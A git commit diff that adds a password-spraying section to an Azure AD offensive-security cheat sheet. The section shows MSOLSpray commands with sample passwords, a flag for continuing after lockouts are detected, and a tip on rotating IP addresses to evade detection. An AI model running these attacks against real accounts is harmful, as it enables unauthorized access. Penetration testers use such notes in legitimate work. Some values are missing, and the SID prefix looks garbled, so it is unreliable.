This commit is contained in:
Swissky 2020-05-11 17:08:03 +02:00
parent 3ed2b28e59
commit e95a4aeac0

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@ -7,6 +7,7 @@
* [Azure Storage Account - Access](#azure-storage-account----access)
* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
* [Azure AD - Enumeration](#azure-ad---enumeration)
* [Azure AD - Password Spray](#azure-ad---password-spray)
* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid)
* [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
@ -286,6 +287,21 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online
3. Pick the account from the active sessions
4. Select Azure Active Directory and enjoy!
## Azure AD - Password Spray
git clone
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
# UserList - UserList file filled with usernames one-per-line in the format ""
# Password - A single password that will be used to perform the password spray.
# OutFile - A file to output valid results to.
# Force - Forces the spray to continue and not stop when multiple account lockouts are detected.
# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from.
## Azure AD - Convert GUID to SID
The user's AAD id is translated to SID by concatenating `"S-1121-"` to the decimal representation of each section of the AAD Id.